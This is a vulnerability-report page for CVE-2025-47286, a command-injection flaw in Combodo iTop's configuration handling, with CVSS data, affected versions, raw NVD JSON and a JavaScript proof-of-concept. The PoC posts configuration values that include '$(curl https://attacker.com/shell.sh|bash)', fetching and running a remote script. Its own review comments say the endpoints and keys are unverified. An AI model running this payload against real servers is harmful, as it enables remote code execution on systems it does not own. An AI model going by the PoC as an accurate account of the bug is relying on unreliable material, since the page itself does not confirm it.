Security Vulnerability Report
CVE-2025-47286 CVSS 7.2 HIGH

CVE-2025-47286

Published: 2025-11-10 19:15:57
Last Modified: 2025-11-21 21:15:31

Description

Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, an administrator can, by editing the configuration of the iTop instance, execute code on the server. Versions 2.7.13 and 3.2.2 escape and check the config parameter before executing a command based on it.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
Combodo iTop < 2.7.13
Combodo iTop >= 3.0.0, < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-47286 PoC - Combodo iTop Configuration Command Injection
// Requires admin privileges
//
// PoC listing as published on this page. It is Node.js JavaScript (axios,
// require, process.argv) even though the page labels the listing "python".
// NOTE(review): nothing on this page beyond the NVD description ties the
// endpoints, operation names and configuration keys used below to iTop;
// the advisory text only says an administrator editing the instance
// configuration could execute code. Treat the request details as unverified.
const axios = require('axios');

/**
 * Sends the two requests the PoC author describes: a login POST, then a
 * configuration-update POST whose values contain shell metacharacters.
 *
 * @param {string} targetUrl - base URL of the iTop instance (no trailing slash assumed)
 * @param {string} sessionCookie - raw Cookie header value sent with both requests
 * @returns {Promise<any>} response body of the second request, or undefined
 *   when either request throws (the catch below does not rethrow)
 */
async function exploit(targetUrl, sessionCookie) {
  const exploitPayload = {
    config: {
      // Malicious configuration with command injection
      // NOTE(review): the advisory does not name these keys; whether they
      // reach a shell unescaped is not established by anything on this page.
      'server_version': '$(curl https://attacker.com/shell.sh|bash)',
      'app_version': '|touch /tmp/pwned'
    }
  };
  try {
    // Step 1: Authenticate as admin
    // Hard-coded admin/password credentials are posted while the caller's
    // session cookie is sent at the same time; authResponse is never read,
    // so this step has no effect on what follows unless the server sets
    // state the second request depends on.
    const authResponse = await axios.post(`${targetUrl}/pages/ajax.php`, {
      operation: 'login',
      username: 'admin',
      password: 'password'
    }, {
      headers: { 'Cookie': sessionCookie }
    });
    // Step 2: Update configuration with malicious payload
    // Form-encoded body; the JSON payload above is carried as one field.
    const exploitResponse = await axios.post(
      `${targetUrl}/pages/admin.php`,
      new URLSearchParams({
        operation: 'config_update',
        config_data: JSON.stringify(exploitPayload)
      }),
      {
        headers: {
          'Cookie': sessionCookie,
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }
    );
    // Only reports that the request was sent; nothing here confirms execution.
    console.log('Exploit sent. Check for RCE at:', targetUrl);
    return exploitResponse.data;
  } catch (error) {
    // Any failure (network error, non-2xx status) is logged and swallowed;
    // the promise then resolves to undefined.
    console.error('Exploit failed:', error.message);
  }
}
// Usage: node cve-2025-47286.js <target-url> <session-cookie>
// Runs on load with positional CLI arguments; neither argument is validated,
// so a missing one is passed through as undefined.
exploit(process.argv[2], process.argv[3]);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47286", "sourceIdentifier": "[email protected]", "published": "2025-11-10T19:15:57.043", "lastModified": "2025-11-21T21:15:31.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, an administrator can, by editing the configuration of the iTop instance, execute code on the server. Versions 2.7.13 and 3.2.2 escape and check the config parameter before executing a command based on it."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.13", "matchCriteriaId": "4738ED01-0CAC-4A19-BE9F-B7E89AAD8D23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.2", "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-4w93-rw6g-5m9c", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}